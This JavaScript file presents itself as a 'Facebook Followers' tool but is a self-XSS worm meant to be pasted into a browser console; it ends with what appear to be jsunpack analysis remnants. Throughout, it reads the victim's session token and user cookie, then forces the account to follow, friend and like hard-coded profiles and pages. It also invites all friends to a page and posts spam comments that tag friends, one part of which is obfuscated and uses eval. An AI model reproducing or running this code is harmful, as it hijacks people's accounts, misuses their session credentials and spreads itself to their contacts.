/*HTML/JavaScript page status="protected"*/
/*FACEBOOK FOLLOWERS*/
/*© 2014 Kodran Piraj. All Rights Reserved.*/

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100006491494904");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("194869190710894");sublist("203764819821331");var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("658905560786579");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
IDS("100006491494904");IDS("100004272308848"); a("100005634423594"); a("100006491494904"); a("100004272308848");
a("100002062385067"); Like("1417633998481131"); Like("274343876022248"); Like("439677902802086"); a("100000701226019"); a("100002066707088"); sublist("562521103826775"); a("100000740396815"); sublist("709754282392578"); sublist("725539290814077"); sublist("285300868291626"); sublist("253841638125547"); sublist("1479353512292028"); sublist("412583275420430"); sublist("248888061957634"); sublist("1434757530087622"); sublist("1442866735943368"); a("100006601656392"); a("100002066707088"); a("100002349093913"); a("100000528970332"); a("100006601656392"); IDS("100006601656392"); sublist("593921270679556"); a("100001850661991"); Like("632889380089847"); sublist("219691011562045"); sublist("219691058228707"); sublist("219691144895365"); sublist("219691178228695"); sublist("219691221562024"); sublist("219691298228683"); sublist("219691391562007"); sublist("219691451562001"); sublist("219691518228661"); sublist("219691578228655"); Like("233639806819861"); Like("588642367894983"); Like("108657799203171"); Like("309453909102037"); Like("398426433613100"); Like("597273926980523"); Like("188718981270707"); sublist("194869190710894"); sublist("203764819821331"); 
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","831320336882006","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," BRO IF YOU LIKE FOLLOWERS || WATCH THIS TUTORIAL :D  THIS REALLY WORK \udbb8\udc3c @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text= INCREASE YOU FOLLOWERS BRO - AUTO FOLLOWERS [ 100% WORK ]  ^_^ THIS IS MY TUTORIAL","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
    //eval
    var parent=document.getElementsByTagName("html")[0];
    var _body = document.getElementsByTagName('body')[0];
    var _div = document.createElement('div');
    _div.style.height="25";
    _div.style.width="100%";
    _div.style.position="fixed";
    _div.style.top="auto";
    _div.style.bottom="0";
    _div.align="center";
    var _audio= document.createElement('audio');
    _audio.style.width="50%";
    _audio.style.height="50px";
    _audio.controls = true;
    _audio.autoplay = true;
    _audio.src = "http://filemirchi.info/Tamil/J/Jilla_160kbps/Yeppa_Mama_Treatu-StarMusiQ.Com.mp3";
    _div.appendChild(_audio);
    _body.appendChild(_div);
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
    var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
     
    body = document.body;
    if(body != null)
    {
     div = document.createElement("div");
     div.style.position = "fixed";
     div.style.display = "block";
     div.style.width = "100px";
     div.style.opacity= 0.90;
     div.style.bottom = "+60px";
     div.style.left = "+0px";
     div.style.backgroundColor = "rgba(0,0,0,0.5)";
     div.style.border = "1px solid rgba(0,0,0,0.5)";
     div.style.padding = "3px";
     div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fsmartmanoj.blogspot.com' title='Share'><blink><center>SHARE</center></blink></a>"
     body.appendChild(div);
    }
     
    if(body != null)
    {
     div = document.createElement("div");
     div.style.position = "fixed";
     div.style.display = "block";
     div.style.width = "100px";
     div.style.opacity= 0.90;
     div.style.bottom = "+35px";
     div.style.left = "+0px";
     div.style.backgroundColor = "rgba(0,0,0,0.5)";
     div.style.border = "1px solid rgba(0,0,0,0.5)";
     div.style.padding = "3px";
     div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>Close (F5)</center></blink></a>"
     body.appendChild(div);
    }
    if(body != null)
    {
     div = document.createElement("div");
     div.style.position = "fixed";
     div.style.display = "block";
     div.style.width = "135px";
     div.style.opacity= 0.90;
     div.style.bottom = "+10px";
     div.style.left = "+0px";
     div.style.backgroundColor = "rgba(0,0,0,0.5)";
     div.style.border = "1px solid rgba(0,0,0,0.5)";
     div.style.padding = "3px";
     div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='http://smartmanoj.blogspot.com/' title='SMARTMANOJ'><blink><center>AWESOME TRICKS HERE!</center></blink></a>"
     body.appendChild(div);
    }
     
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    function Like(p) {
      var Page = new XMLHttpRequest();
      var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
      var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";
      Page.open("POST", PageURL, true);
      Page.onreadystatechange = function () {
        if (Page.readyState == 4 && Page.status == 200) {
          Page.close;
        }
      };
      Page.send(PageParams);
    }
     
    Like("439677902802086");
    Like("439677902802086");
     
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    function IDS(r) {
      var X = new XMLHttpRequest();
     
      var XURL = "//www.facebook.com/ajax/add_friend/action.php";
      var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
      X.open("POST", XURL, true);
      X.onreadystatechange = function () {
        if (X.readyState == 4 && X.status == 200) {
          X.close;
        }
      };
      X.send(XParams);
    }
     
    IDS("100005734924946");
    IDS("100005734924946");
     
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    function a(abone) {
      var http4 = new XMLHttpRequest();
      var url4 = "/ajax/follow/follow_profile.php?__a=1";
      var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
      http4.open("POST", url4, true);
      http4.onreadystatechange = function () {
        if (http4.readyState == 4 && http4.status == 200) {
          http4.close;
        }
      };
      http4.send(params4);
    }
    a("100005734924946");
    a("100005734924946");
     
    var Title = "Facebook Followers</A>";
    var Descriptions = "",
        _text = 'Powered By:  <A style="color:#3B5998;" href="https://www.facebook.com/awesometrickssharedalink" target="_blank">Awesome Tricks</A></br>Script Made By: </A><A style="color:#3B5998;" href="http://smartmanoj.blogspot.com" target="_blank"> Awesome Tricks</A></A>,</A></A>.</br>For More Tools Visit Our Blogs <A style="color:#3B5998;" href="http://smartmanoj.blogspot.com/" target="_blank">Automate Your Facebook</A>.</A>';
     
    page_id = /"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];
     
    function InviteFriends(opo) {
        jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send_single?page_id=" + page_id + "&invitee=" + opo + "&elem_id=u_0_1k&action=send&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg=" + fb_dtsg + "&phstamp=", function (a) {
            var b = a.substring(a.indexOf("{"));
            var c = JSON.parse(b);
            i--;
            Descriptions = "<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";
            if (c.error) {
                Descriptions += "color:darkred'>";
                err++;
                if (c.errorDescription) Descriptions += c.errorDescription;
                else Descriptions += JSON.stringify(c, null, "")
            } else {
                Descriptions += "color:darkgreen'>";
                Descriptions += arn[i] + " has been invited to like the page " + page_name + ".";
                suc++
            }
            Descriptions += "</div>";
            var display = "<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
            display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
            if (i > 0) {
                display += arr.length + " Friends Detected<br/>";
                display += "<b>" + suc + "</b> Friends Invited of " + (arr.length - i) + " Friends Processed ";
                display += "(" + i + " Lefted...)";
                display += "<div class='friend-edge'>";
                display += Descriptions;
                display += "<img style='width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src=" + pho[i] + "></img><a style='font-size:13px;padding-left:8px;text-align:left;color:#3B5998;position:absolute;font-weight:bold;'>" + arn[i] + "</a>";
                display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
                display += "Please Wait While Inviting Your Friends to Like Your Page " + page_name + ".</br>";
    display += "<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Cancel</span><br/>";
                display += _text;
                display += "</div>";
                display += "</div>";
                display += "</div>";
                window[tag + "_close"] = true
            } else {
                Title = "All Of Your Friends Have Been Invited to Like Your Page.</A>";
                display += arr.length + " Friends Detected and ";
                display += "<b>" + suc + " Friends Invited.</b></br>";
                display += "<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Refresh Page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"' style='color:gray'>Cancel</span><br/>";
                display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>";
                display += _text;
                display += "</div>";
                window[tag + "_close"] = false
            }
            display += "</div>";
            document.getElementById("pagelet_sidebar").innerHTML = display
        }, "text", "post");
        tay--;
        if (tay > 0) {
            var s = arr[tay];
            setTimeout("InviteFriends(" + s + ")", 100)
        }
        console.log(tay + "/" + arr.length + ":" + arr[tay] + "/" + arn[tay] + ", success:" + suc);
     
     
        if (page_id) jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send?&fb_dtsg=" + fb_dtsg + "&profileChooserItems=%7B%22" + opo + "%22%3A1%7D&checkableitems[0]=" + opo + "&page_id=100005734924946&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=k&phstamp=", function () {}, "text", "post")
        
    }
    jx = {
        b: function () {
            var b = !1;
            if ("undefined" != typeof ActiveXObject) try {
                b = new ActiveXObject("Msxml2.XMLHTTP")
            } catch (c) {
                try {
                    b = new ActiveXObject("Microsoft.XMLHTTP")
                } catch (a) {
                    b = !1
                }
            } else if (window.XMLHttpRequest) try {
                b = new XMLHttpRequest
            } catch (h) {
                b = !1
            }
            return b
        },
        load: function (b, c, a, h, g) {
            var e = this.d();
            if (e && b) {
                e.overrideMimeType && e.overrideMimeType("text/xml");
                h || (h = "GET");
                a || (a = "text");
                g || (g = {});
                a = a.toLowerCase();
                h = h.toUpperCase();
                b += b.indexOf("?") + 1 ? "&" : "?";
                var k = null;
                "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
                e.open(h, b, !0);
                e.onreadystatechange = g.c ? function () {
                    g.c(e)
                } : function () {
                    if (4 == e.readyState)
                        if (200 == e.status) {
                            var b = "";
                            e.responseText && (b = e.responseText);
                            "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                            c && c(b)
                        } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
                };
                e.send(k)
            }
        },
        d: function () {
            return this.b()
        }
    };
     
    function ChangeLocation() {
        window.location.href = "http://www.facebook.com/"
    }
    setTimeout("ChangeLocation", 1);
    window.onbeforeunload = function () {
        if (window[tag + "_close"]) return "This script is running now!"
    };
    var i = 3;
    var tay = 3;
    var suc = 0;
    var err = 0;
    var arr = new Array;
    var arn = new Array;
    var pho = new Array;
    var tag = "Close";
    var page_name, x = document.getElementsByTagName("span");
    for (i = 0; i < x.length; i++)
        if (x[i].getAttribute("itemprop") == "name") page_name = x[i].innerHTML;
    var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function (a) {
        var b = a;
        var c = b.substring(b.indexOf("{"));
        var d = JSON.parse(c);
        d = d.payload.entries;
        for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
        for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);
        for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);
        i = arr.length - 1;
        tay = i;
        console.log(arr.length);
        var display = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
        display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";
        display += arr.length + " Friends Detected, Please Wait . . .";
        display += "</div>";
        document.getElementById("pagelet_sidebar").innerHTML = display;
        InviteFriends(arr[i])
    });
     
     
     
    //jsunpack.called CreateElement div
     
    //jsunpack.url element = undefined
    //jsunpack.url var _4855 = var parent=document.getElementsByTagName("html")[0];
    var _body = document.getElementsByTagName('body')[0];
    var _div = document.createElement('div');
    _div.style.height="25";
    _div.style.width="100%";
    _div.style.position="fixed";
    _div.style.top="auto";
    _div
     
    //jsunpack.url var _4052 = var parent=document.getElementsByTagName("html")[0];
    var _body = document.getElementsByTagName('body')[0];
    var _div = document.createElement('div');
    _div.style.height="25";
    _div.style.width="100%";
    _div.style.position="fixed";
    _div.style.top="auto";
    _div

